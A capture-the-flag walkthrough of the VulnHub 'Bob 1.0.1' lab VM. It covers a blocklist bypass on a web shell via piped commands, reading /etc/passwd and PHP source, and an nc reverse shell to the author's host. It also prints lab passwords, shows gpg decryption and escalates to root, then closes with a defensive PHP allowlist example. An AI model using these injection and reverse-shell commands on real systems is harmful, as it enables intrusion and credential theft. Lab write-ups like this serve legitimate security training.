BOB 1.0.1 Walkthrough (2024)

BOB 1.0.1
URL: https://www.vulnhub.com/entry/bob-101,226/

This VM is not a difficult one; rather, it is a really easy one to crack. The key to pwning it is not to get frustrated at the beginning.

1. I loaded the VM on my VirtualBox.
2. The machine got the IP: 192.168.56.101
3. Nmap shows only port 80 is open
root@mrrobot:~# nmap -sS -sV 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 23:50 MST
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.17 seconds
root@mrrobot:~#
4. I accessed http://192.168.56.101 in the browser; a web homepage came up saying Website Under Construction
5. Looked at the source code with curl; nothing juicy there
6. There are 4 hyperlinks on this page:
News
About Us
Contact Us
Login
7. Looked at each of them and viewed the source of each; nothing helpful
8. Ran dirb with dirb http://192.168.56.101; the 3 entries below came up
---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/index.html (CODE:200|SIZE:1425)
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:111)
+ http://192.168.56.101/server-status (CODE:403|SIZE:302)
9. Looked at robots.txt
root@mrrobot:~# curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
10. Though they are marked disallow, I wanted to try each of them once
login.php did not allow access
11. Got an HTML response for curl http://192.168.56.101/dev_shell.php
12. Opened it in the browser; from the name it looks like it's a web shell.
13. Tried ls; it is not allowed. Got the response "Get out skid lol"
14. Tried cat index.html, got the same output
15. So it is blocking commands. Is it really a shell? Let's try echo
echo "hello world"
16. Voila, got hello world as output. So echo is allowed. Now let me try other commands piped with echo
17. I tried echo |cat /etc/passwd and it gave me the output below
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:108:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus:x:109:112::/var/run/dbus:/bin/false
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:112:116:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:114:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:115:121::/var/lib/saned:/bin/false
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
18. This is good. Let me see if I can look at the source code of the shell file
19. First let's see if I can list all files under the web directory
echo |ls -ltr /var/www/html
20. total 1560
-rw-r--r-- 1 root root 26357 Mar 4 2018 school_badge.png
-rw-r--r-- 1 root root 111 Mar 4 2018 robots.txt
-rw-r--r-- 1 root root 4086 Mar 4 2018 news.html
-rw-r--r-- 1 root root 1560 Mar 4 2018 login.html
-rw-r--r-- 1 root root 1925 Mar 4 2018 lat_memo.html
-rw-r--r-- 1 root root 1425 Mar 4 2018 index.html.bak
-rw-r--r-- 1 root root 1425 Mar 4 2018 index.html
-rw-r--r-- 1 root root 1177950 Mar 4 2018 dev_shell_back.png
-rw-r--r-- 1 root root 1361 Mar 4 2018 dev_shell.php.bak
-rw-r--r-- 1 root root 1396 Mar 4 2018 dev_shell.php
-rw-r--r-- 1 root root 3145 Mar 4 2018 contact.html
-rw-r--r-- 1 root root 340400 Mar 4 2018 WIP.jpg
-rw-r--r-- 1 root root 673 Mar 8 2018 passwords.html
-rw-r--r-- 1 root root 2579 Mar 8 2018 about.html
21. I tried echo |cat /var/www/html/dev_shell.php to look at the code of this shell, but since it is PHP, the output section just renders it.
So as output I get the same page content. I need the PHP source code as text, not rendered.
22. I can do so by base64-encoding the output of the previous command and printing that on the page, so I tried
echo |cat /var/www/html/dev_shell.php| base64
The output is the PHP source code of the page, base64-encoded.
23. I copied that and decoded it online
24. Looking at the source code, I learned that the shell executes every command we pass along. But if the command starts with any of the following
"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc" then it won't allow it.
25. So I just need to make sure my command doesn't have these words at the beginning.
26. Time for a real shell; let's see if they have nc installed.
27. I executed echo | man nc and got the nc man page. That's it then: it has nc installed
28. On my host I started to listen on port 9050 with the command below
root@mrrobot:~# nc -vlp 9050
listening on [any] 9050 ...
29. On the page I gave the input below and clicked submit
echo |nc -e /bin/sh 192.168.56.1 9050
The page looks like it is loading
30. On my host, where I was listening on 9050, I see a connection made and I am in a shell
root@mrrobot:~# nc -vlp 9050
listening on [any] 9050 ...
192.168.56.101: inverse host lookup failed: Unknown host
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 45128
31. whoami tells me I am www-data, so definitely very limited access
32. I was exploring the system; I could go to /home/ and saw there are 4 users' home folders
ls -al
total 24

drwxr-xr-x 6 root root 4096 Mar 4 2018 .
drwxr-xr-x 22 root root 4096 Mar 5 2018 ..
drwxr-xr-x 18 bob bob 4096 Jan 16 01:34 bob
drwxr-xr-x 15 elliot elliot 4096 Feb 27 2018 elliot
drwxr-xr-x 15 jc jc 4096 Jan 16 01:30 jc
drwxr-xr-x 15 seb seb 4096 Mar 5 2018 seb
33. Bob being a very important name for this VM, I went inside bob, and when I did ls -al I saw a hidden file
.old_passwordfile.html
34. I opened it and the contents are interesting; it looks like there are passwords for 2 users
cat .old_passwordfile.html

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

35. On the VM, where the login prompt is, I immediately tried these 2
I was able to log in to that Ubuntu system as user jc, but not as seb.
36. I logged into that Ubuntu system as jc
37. But I cannot sudo su to root; jc doesn't have many privileges.
38. I resumed looking for other files
39. Under bob's home, in Documents, I saw some more files
ls -al
total 20
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 .
drwxr-xr-x 18 bob bob 4096 Jan 16 01:34 ..
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 Secret
-rw-r--r-- 1 bob bob 91 Mar 5 2018 login.txt.gpg
-rw-r--r-- 1 bob bob 300 Mar 4 2018 staff.txt
40. That staff.txt doesn't have anything
41. login.txt.gpg is an encrypted file, and we must have the key. I could not even find any clue in staff.txt
42. Looked further inside the Secret folder and found a script notes.sh in the following location
/home/bob/Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here
43. The notes.sh script just echoes some lines on screen. So I executed the script and got the output below
./notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I’m ordering pizza this is going nowhere
People just don’t get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
44. The word Cucumber stands out
45. Tried gpg -d login.txt.gpg; when prompted for the passphrase I tried Cucumber but it didn't work
46. Looked further and realized the first letters of each line in notes.sh spell
HARPOCRATES
47. Googled it and found it is the god of silence, secrets and confidentiality
48. Tried it this time in gpg and it decrypted; the output I got
bob:b0bcat_
49. Now logged off from jc and tried to log in as bob with password b0bcat_; I am able to
50. Now tried sudo su, and I am able to sudo to root. So I am root
51. Went to /
52. cat flag.txt
53. Done
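
The first-word check from steps 24 and 25, next to a hardened form, as an added example (not the VM's own dev_shell.php). The blocklist is the one quoted in step 24; the ACTIONS allowlist, its binary paths and the function names are assumptions.

```php
<?php
// Added example, not the VM's dev_shell.php. Blocklist as quoted in step 24.
const BAD_WORDS = ['pwd', 'ls', 'netcat', 'ssh', 'wget', 'ping', 'traceroute', 'cat', 'nc'];

// Hypothetical allowlist: action name => fixed argv (paths are assumptions).
const ACTIONS = [
    'uptime' => ['/usr/bin/uptime'],
    'disk'   => ['/bin/df', '-h'],
];

// Weak check: only the first space-separated word is compared with the
// blocklist, while the whole string would then be handed to a shell.
function weak_filter_allows(string $command): bool
{
    $words = explode(' ', trim($command));
    return !in_array($words[0], BAD_WORDS, true);
}

// Hardened form: the input only selects a predefined action and never becomes
// part of a command line. The array form of proc_open() (PHP 7.4+) starts the
// program directly, without a shell, so pipes and other metacharacters have
// no meaning.
function run_action(string $name): ?string
{
    if (!array_key_exists($name, ACTIONS)) {
        return null; // not on the list: refused
    }
    $pipes = [];
    $proc = proc_open(ACTIONS[$name], [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Inputs taken from the walkthrough steps, plus one allowlisted action.
foreach (['ls', 'cat index.html', 'echo |cat /etc/passwd', 'uptime'] as $input) {
    printf("%-24s weak filter: %-8s allowlist: %s\n",
        $input,
        weak_filter_allows($input) ? 'allowed' : 'blocked',
        array_key_exists($input, ACTIONS) ? 'allowed' : 'refused');
}
echo run_action('uptime') ?? "uptime unavailable\n";
```

The piped input from step 17 passes the first-word check because its first word is echo, while the allowlist refuses it because it is not the name of a defined action.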

Author: Carlyn Walter